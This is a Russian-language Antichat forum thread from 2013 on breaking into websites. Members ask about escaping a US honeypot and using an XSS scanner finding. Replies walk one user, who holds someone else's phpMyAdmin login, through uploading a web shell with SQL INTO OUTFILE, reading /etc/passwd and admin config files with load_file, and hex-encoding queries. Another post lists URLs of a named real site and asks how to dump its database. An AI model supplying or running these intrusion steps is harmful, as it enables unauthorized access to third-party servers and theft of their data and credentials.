HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 01.04.2013, 01:00
tigrOOO1
Новичок
Регистрация: 31.03.2013
Сообщений: 8
С нами: 6904406

Репутация: 0
По умолчанию

Если я попался на хоней пот
я например из Китая а хоней пот в США мне что то будет если спалюсь?
 
Ответить с цитированием

  #2  
Старый 24.04.2013, 01:00
fikal
Новичок
Регистрация: 29.09.2012
Сообщений: 2
С нами: 7167926

Репутация: 0
По умолчанию

народ помогите пожалуйста,acunetix нашёл xss и пишет вот такое:
URL encoded POST input weapon was set to '"()&%1prompt(920792)
как это использовать? где? куда вставлять?
Заранее спасибо!!!
 
Ответить с цитированием

  #3  
Старый 24.04.2013, 01:00
ZoRKeG
Познавший АНТИЧАТ
Регистрация: 05.08.2011
Сообщений: 1,690
С нами: 7774166

Репутация: 255


По умолчанию

Цитата:

Сообщение от fikal

народ помогите пожалуйста,acunetix нашёл xss и пишет вот такое:
URL encoded POST input weapon was set to '"()&%1prompt(920792)
как это использовать? где? куда вставлять?
Заранее спасибо!!!

>>URL encoded POST input weapon was set to
Ты сам ответил на свой вопрос - это XSS
 
Ответить с цитированием

  #4  
Старый 24.04.2013, 01:00
fikal
Новичок
Регистрация: 29.09.2012
Сообщений: 2
С нами: 7167926

Репутация: 0
По умолчанию

Цитата:

Сообщение от ZoRKeG

>>URL encoded POST input weapon was set to
Ты сам ответил на свой вопрос - это XSS

ну это я понял, ну а дальше что надо ваять? читал разные мануалы но так ине понял куды это надо засовывать, и какие манипуляции делать( Может линк какой нибудь кинешь чтоб по полочкам? или сам если не трудно)))
 
Ответить с цитированием

  #5  
Старый 24.04.2013, 01:00
qwerty333
Познающий
Регистрация: 28.02.2010
Сообщений: 69
С нами: 8527286

Репутация: -2
По умолчанию

Цитата:

Сообщение от fikal

ну это я понял, ну а дальше что надо ваять? читал разные мануалы но так ине понял куды это надо засовывать, и какие манипуляции делать( Может линк какой нибудь кинешь чтоб по полочкам? или сам если не трудно)))

выкинь свой сканер на помойку, с ним ты ничему не научишся, и для начала научись пользоватся гуглом, там статей на тему хсс милионы
 
Ответить с цитированием

  #6  
Старый 26.07.2013, 01:00
shama1221
Новичок
Регистрация: 26.07.2013
Сообщений: 1
С нами: 6735926

Репутация: 0
По умолчанию

Я знаю пароль и логин от одного phpmyadmin, но там закрыт удаленный доступ, я знаю что нужно подключиться к серверу через ssh туннель, что бы можно было зайти в пхп, но подключиться не могу, там закрыты порты 22 и 3306. Есть еще какие нибудь способы?
 
Ответить с цитированием

  #7  
Старый 26.07.2013, 01:00
Rurr
Новичок
Регистрация: 12.01.2013
Сообщений: 3
С нами: 7016726

Репутация: 0
По умолчанию

если залить шелл можно открыть себе любой порт
 
Ответить с цитированием

  #8  
Старый 26.07.2013, 01:00
BlaIzEr
Участник форума
Регистрация: 31.12.2012
Сообщений: 139
С нами: 7034006

Репутация: 12
По умолчанию

Цитата:

Сообщение от Rurr

если залить шелл можно открыть себе любой порт

Чувак ты походу темой ошибся, лол.
ТС без шелла тебе ничего не светит в первую очередь
Как вариант можно попробовать сунуть скл запрос чтобы ЗАЛИТЬ ШЕЛЛ (нужно знать полный путь до сайта, как его определить отпишу ниже)

code:

select '' into outfile '/home/hpc.name/shell.php';

если не хватит прав (з.ы file_priv Y может не хватить) пробуешь мини шелл

code:

select '' from mysql.user into outfile '/home/hpc.name/shell.php'

если и эта хуерга не прокатит пробуешь шифрануть запрос sql hex вот сайтеГ _http://x3k.ru/
и опять же пробуешь обе команды, и опять же если не прокатит, или нету достаточно прав либо руки кривые пробуешь слить конфиг админки если данные от него хранятся на сервере, либо в пма покопайся (что уж оч редко =) )
командой

code:

select load_file('/etc/passwd')

/etc/passwd это пример пути вместо него пробуй подобрать путь к конфу, если админка в папке /admin пробуешь примерно так

code:

select load_file('/home/hpc.name/admin/config.php')

если ты везунчик удача тебе улыбнется, а если нет ищи дальше.
Кстати чуть не забыл... полный путь до сайта ты можешь узнать в том же файле /etc/passwd.
з.ыыыыыы я так и не понял, какова ваша цель , опишите поподробней!

За дополнительными вопросами в ЛС. =)
 
Ответить с цитированием

  #9  
Старый 31.07.2013, 01:00
25isb2010
Познающий
Регистрация: 10.11.2011
Сообщений: 76
С нами: 7634486

Репутация: 13
По умолчанию

Ребята, Всем ПРИВЕТ!!!
Подскажите по этим ссылкам действительно можно найти какую нить уязвимость?
Может кто нибудь, сможет указать уязвимость, и вообще реально ли по ним слить базу?

code:

http://gnevbogov.ru/forum/index.php?app=forums&module=forums&section=markasr ead&marktype=forum&forumid=13&returntoforumid=0&i=
http://gnevbogov.ru/forum/index.php?forumid=13&returntoforumid=0&i=1&app=for ums&module=forums&section=markasread&marktype=foru m
http://gnevbogov.ru/forum/index.php?section=login&app=core&module=global
http://gnevbogov.ru/forum/index.php?app=core&section=99999999
http://gnevbogov.ru/forum/index.php?module=profile&section=friends&do=add&me mber_id=&app=members
http://gnevbogov.ru/forum/index.php?app=core&section=
http://gnevbogov.ru/forum/index.php?module=profile&section=friends&do=add&me mber_id=&app=99999999
http://gnevbogov.ru/forum/index.php?module=profile&section=friends&do=add&me mber_id=&app=
http://gnevbogov.ru/forum/index.php?member_id=&app=members&module=profile&se ction=friends&do=remove
http://gnevbogov.ru/forum/index.php?app=core&module=search&do=new_posts&sear ch_filter_app[forums]=1
http://gnevbogov.ru/forum/index.php?app=forums&module=forums&section=markasr ead&marktype=forum&forumid=13&returntoforumid=0&i= 1
http://gnevbogov.ru/forum/index.php?section=login&app=core&module=99999999
http://gnevbogov.ru/forum/index.php?member_id=&app=members&module=profile&se ction=friends&do=99999999

Ссылки не мои я их взял на здешнем сайте в раздачах, вот и захотел поинтересоваться! https://hpc.name/showthread.php?t=47142
Барышня которая их раздаёт могла бы сразу уязвимости выложить!
Спасибо надеюсь на ответ.
 
Ответить с цитированием

  #10  
Старый 31.07.2013, 01:00
ZoRKeG
Познавший АНТИЧАТ
Регистрация: 05.08.2011
Сообщений: 1,690
С нами: 7774166

Репутация: 255


По умолчанию

Цитата:

Сообщение от BlaIzEr

полный путь до сайта ты можешь узнать в том же файле /etc/passwd.

Там не всегда полный путь, иногда просто установочная директория, к примеру, там будет запись мол корень это /usr/local/ а на самом деле корень сайта будет /usr/local/www-data/ (из своего опыта говорю).
Плюс, если работает load_file('/etc/passwd') то лучше сперва залить шелл в /tmp/ и попробовать загрузить его, если гуд - пытаемся искать папку с подходящими правами (/temp/; /tmp/; /uploads/; /test/.

Цитата:

Сообщение от 25isb2010

Подскажите по этим ссылкам действительно можно найти какую нить уязвимость?

В лом регистрировать на форуме, но скулей вроде не пахнет, а вот XSS +-
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.